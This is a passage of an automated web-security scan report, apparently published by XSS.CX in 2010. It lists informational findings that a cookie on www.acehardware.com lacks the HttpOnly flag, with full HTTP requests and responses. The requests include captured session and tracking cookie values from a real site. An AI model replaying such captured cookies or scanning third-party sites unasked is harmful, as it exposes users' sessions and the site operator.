The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 29 Dec 2010 16:23:37 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://www.acehardware.com/search/noResults.jsp
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; expires=Monday, 16-Jan-2079 19:37:44 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 289

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.acehardware.com/search/
...[SNIP]...

5.5. http://www.acehardware.com/shop/index.jsp  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /shop/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/index.jsp HTTP/1.1
Host: www.acehardware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=QQhlNbfS3Kv1TJy3QydzV5G1DLjS9c5b97p8tppcJvvFN7SYR5mQ!-141289455; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.acehardware.com/home/index.jsp%3Frdir%3D1A_2___1293639576820%7Cc%3A285307860616199%7Cd%3A1%7Ca%3A1%7Ce%3A0.5%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_sess=%20s_p7_persist%3DCABECOME_DF%253A3388719%253AACE%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=185450681.1293639556.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.a=1293639580923; rvp=3388719:; browser_id=118733033484; __g_u=285307860616199_1_0.5_0_5_1294068625634_1; s_pers=%20s_nr%3D1293636701994%7C1296228701994%3B%20s_lastvisit%3D1293639556668%7C1388247556668%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1293641380330%3B; fsr.session={"v":1,"rid":"1293636636322_310950","pv":3,"to":4.6,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1293639577528}; rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; __utma=185450681.1598117939.1293639556.1293639556.1293639556.1; __utmc=185450681; __utmb=185450681.1.10.1293639556;

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 29 Dec 2010 16:23:29 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://www.acehardware.com/home/index.jsp
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR79524e5917584a1a0f4f1a175b0a0a0304; expires=Monday, 16-Jan-2079 19:37:36 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 277

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.acehardware.com/home/in
...[SNIP]...

Report generated by XSS.CX at Wed Dec 29 11:39:41 CST 2010.